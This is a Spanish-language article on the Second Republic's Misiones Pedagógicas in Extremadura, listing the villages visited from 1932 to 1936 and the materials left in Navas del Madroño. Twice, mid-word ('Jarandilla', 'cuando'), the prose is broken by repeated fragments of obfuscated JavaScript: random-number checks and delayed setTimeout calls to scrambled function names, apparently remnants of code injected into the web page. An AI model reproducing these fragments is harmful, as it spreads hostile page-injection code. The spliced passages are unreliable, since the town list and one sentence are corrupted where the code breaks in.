LAS MISIONES PEDAGÓGICAS EN LOS PUEBLOS EXTREMEÑOS (1931-1936)

Autora: Paula Álvarez Sánchez

          La Segunda República trajo consigo nuevos aires de  reforma a la educación española conocida hasta entonces. Este es el punto de partida de este artículo que pretende recordar, o dar a conocer, la incidencia de esta en Extremadura.

          Se promovieron multitud de cambios en este periodo, entre otros, la consideración de funcionario  de carrera al maestro y una educación laica, activa, social, coeducativa, obligatoria y gratuita entre los seis y los doce años, y que se ocupará de la formación de las personas adultas. Aunque, sin duda, la  revolución  de verdad fue el concepto de acercar la cultura a los pueblos y aldeas deprimidos de la geografía española; en consecuencia, llenar mentes sedientas de cultura y conocimientos y colmar de ilusiones a la juventud. Así, los maestros se convierten en protagonistas de los cambios  sociales y educativos.

          El proyecto que permitió esto se denominó Misiones Pedagógicas y  fue creado por el Museo Pedagógico Nacional, inspirado en la filosofía de la Institución Libre de Enseñanza, que pretendía una nueva mirada a los antiguos métodos de educación en España. Se fundó el Patronato de Misiones Pedagógicas a través del Decreto 202 de 29 de mayo de 1931, cuyos objetivos eran difundir la cultura general, la moderna orientación docente y la educación ciudadana en aldeas, villas y lugares, con especial atención a los intereses espirituales de la población ruraly Manuel Bartolomé Cossío asumiría ejercer el cargo de presidente de dicho Patronato.

          Las acciones  primitivas que se promovían estaban destinadas a:

  • Fomentar la cultura general a través de la creación y mantenimiento de bibliotecas fijas y móviles, proyecciones cinematográficas, representaciones teatrales y museos circulantes.
  • Asesoramiento pedagógico a maestros de escuelas rurales.
  • Educar a los ciudadanos para hacer más comprensibles los principios por los que se rige un Gobierno moderno y democrático a través de charlas y coloquios.

          Gracias a estas Misiones Pedagógicas muchas personas, en su mayoría campesinos, tuvieron una ventana a la fantasía, a la esperanza, a la ilusión y a la cultura. Gran parte de ese campesinado era analfabeto, un 44%, y las misiones suscitaban  un gran recelo entre la élite socio-económica de los pueblos, ya que fomentaban el asociacionismo (los sindicatos obreros) para defender intereses comunes.

          En Extremadura,  según la web  http://cipres.residencia.csic.es/misiones/, en el año 1932 hubo una misión que recorrió, en la provincia de Cáceres, los pueblos de Garrovillas, Herreruela, Navas del Madroño, Piedras Albas y Salorino. En el 34, en la misma provincia,  hubo misiones que visitaron Aldeanueva de la Vera, Casas del Castañar, Herrera de Alcántara, Higuera, Hinojal, Las Huertas de Cansa, Jerte, Membrio, El Pino, Piornal, Robledillo de la Vera, Salvatierra de Santiago, Santiago del Campo, Sierra de Fuentes, Tejeda, Zarza de Montánchez, Higuera, Cáceres, Talaván, Monroy, Navaconcejo, Jarandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andilla y Navalmoral. En el mismo año, en la provincia de Badajoz, Castilblanco , Fuenlabrada de los Montes, Helechosa de los Montes, Herrera del Duque, Peloche, Siruela, Valdecaballeros y Alburquerque. Y ya en el año 1935 hubo otras misiones que visitaron Conquista, Santa Cruz de la Sierra, El Puerto de Santa Cruz, La Cumbre, Ruanes, Guadalupe y Herguijuela. La última misión de la que se tienen datos es en 1936, que se visitaron Escurial y San Pedro de Mérida, el 4/1/36, y Las Hurdes del 12/5/36 al 4/6/36. En su  mayoría, las actividades que se llevaron a cabo fueron el museo del pueblo, cine, teatro, coro y música.

          Un caso a destacar  en Extremadura es la aparición, en Navas del Madroño, de material de la época, concretamente de 1932, según investigó Antonio de la Cruz Solís. Un material que fue llevado personalmente por María Zambrano, muy implicada en las misiones, que, como llevaban música, dejaron al pueblo discos variados y una  gramola. También hubo cine (se visionó la película Granada), se atendieron las necesidades materiales de los habitantes de Navas y se les informó de sus derechos y obligaciones. Los maestros tuvieron noticia de los nuevos métodos didácticos, se les dejó equipos de Metrología Escolar y otros materiales, y, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando se dio por concluida la estancia de los misioneros, se hizo entrega de la preciada biblioteca: cien libros para adultos y niños, que fueron depositados en la escuela bajo la supervisión de D. Eulalio Cruz, maestro local.

           Hemos de aprender de la historia de los muchos maestros que, desde la modestia de sus destinos, ofrecieron cauces de expresión y pensamiento a las personas más desfavorecidas. La labor  del maestro debe ser, en esencia, lo que pretendían las Misiones Pedagógicas: hacer que “florezcan los pupitres”.


  

Bibliografía:

  • Colom, A y Dominguez,E, Introducción a la política de la educación, Barcelona, Arial Educación, 1997.
  • De la Cruz Solís, Antonio, “La biblioteca del Patronato de Misiones Pedagógicas de Navas del Madroño (Cáceres)”, Educación  y biblioteca, Mayo- Junio nº18, 2006.
  • http://cipres.residencia.csic.es/misiones/

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